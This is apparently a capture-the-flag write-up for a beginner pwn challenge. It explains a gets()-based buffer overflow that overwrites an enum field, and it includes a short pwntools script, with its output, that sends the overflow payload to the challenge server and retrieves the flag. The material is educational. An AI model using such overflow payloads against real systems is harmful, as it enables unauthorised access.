Viewer
======

## Challenge

This is a good pwn challenge to start with. Use the help button to ask for a hint if you get stuck.

Viewer to view many things

```ncat --ssl viewer.challs.pwnoh.io 1337```

## Included files
* chall.c
* viewer

## Analysis
The server provides a few things for a user to view: fibonacci, art, flag or random.

Obviously we wish to retrieve the flag, however we are not admin.
There is an obvious buffer overflow as gets does not have an upper bound.
input has only 10 characters in it, let's overflow into viewee. The value we need is 3, as it is the 4th item in the enum.

In [10]:
from pwn import *
conn = remote("viewer.challs.pwnoh.io", 1337, ssl=True)
conn.recvuntil(b"> ")
conn.sendline(b"flag" + b"\x03" * 8)
print(conn.recvlineS())
conn.close()


[x] Opening connection to viewer.challs.pwnoh.io on port 1337
[x] Opening connection to viewer.challs.pwnoh.io on port 1337: Trying 2600:1f16:75:1c01::4
[+] Opening connection to viewer.challs.pwnoh.io on port 1337: Done
bctf{I_C4nt_Enum3rAte_7hE_vuLn3r4biliTI3s}

[*] Closed connection to viewer.challs.pwnoh.io port 1337
